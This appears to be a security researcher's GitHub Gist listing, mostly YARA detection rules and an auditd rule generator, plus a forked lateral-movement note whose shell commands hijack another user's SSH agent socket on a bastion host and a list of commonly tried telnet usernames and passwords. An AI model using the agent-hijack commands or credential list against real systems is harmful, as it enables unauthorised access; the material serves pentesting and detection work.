Tim Brown timb-machine
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import "elf" | |
| rule enterpriseapps2 { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "Enterprise apps" | |
| strings: | |
| $db2 = "db2" nocase | |
| $oracle = "oracle" nocase | |
| $mysql = "mysql" nocase |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import "elf" | |
| rule enterpriseunix2 { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "Enterprise UNIX" | |
| strings: | |
| $aix = "aix" nocase | |
| $solaris = "solaris" nocase | |
| $hpux = "hpux" nocase |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule adonunix2 { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "AD on UNIX" | |
| strings: | |
| $quest = "/quest" | |
| $sss = "/sss" | |
| $pbis = "/pbis" | |
| $ipa = "/ipa" | |
| $samba = "/samba" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule ciscotools { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "Cisco tools" | |
| strings: | |
| $labs = "labs.portcullis.co.uk" | |
| $portcullislabs = "portcullislabs" | |
| $CiscoCXSecurity = "CiscoCXSecurity" | |
| $timb_machine = "timb_machine" | |
| $pentestmonkey = "pentestmonkey" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Description: Accept environment changes. | |
| Accept environment changes during negotiation by the client. | |
| Author: Tim Brown <github@timb.me.uk> | |
| --- | |
| The information above should follow the Patch Tagging Guidelines, please | |
| checkout http://dep.debian.net/deps/dep3/ to learn about the format. Here | |
| are templates for supplementary fields that you might want to add: | |
| Origin: <vendor|upstream|other>, <url of original patch> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule aix { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "AIX binary" | |
| strings: | |
| $libca = "libc.a" | |
| $text = ".text" | |
| $data = ".data" | |
| condition: | |
| $libca and $text and $data |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| generate_file_rule () { | |
| filepermissions="${1}" | |
| rulename="${2}" | |
| while read filename | |
| do | |
| printf -- "-w %s -p %s -k %s\n" "${filename}" "${filepermissions}" "${rulename}" | |
| done | |
| } |
timb-machine
/ AWS API calls that return credentials.md
Created
February 22, 2021 19:02
— forked from kmcquade/AWS API calls that return credentials.md
AWS API calls that return credentials
timb-machine
/ SSH Agent Forwarding.md
Created
February 20, 2021 10:51
— forked from int0x80/SSH Agent Forwarding.md
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld
user@internal:~$ hostname -f
internal.company.tld
timb-machine
/ Telnet authentication strings
Created
February 13, 2021 19:36
Telnet authentication strings
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 461 root | |
| 392 | |
| 160 admin | |
| 94 default | |
| 39 guest | |
| 24 support | |
| 21 user | |
| 20 1234 | |
| 16 password | |
| 15 12345 |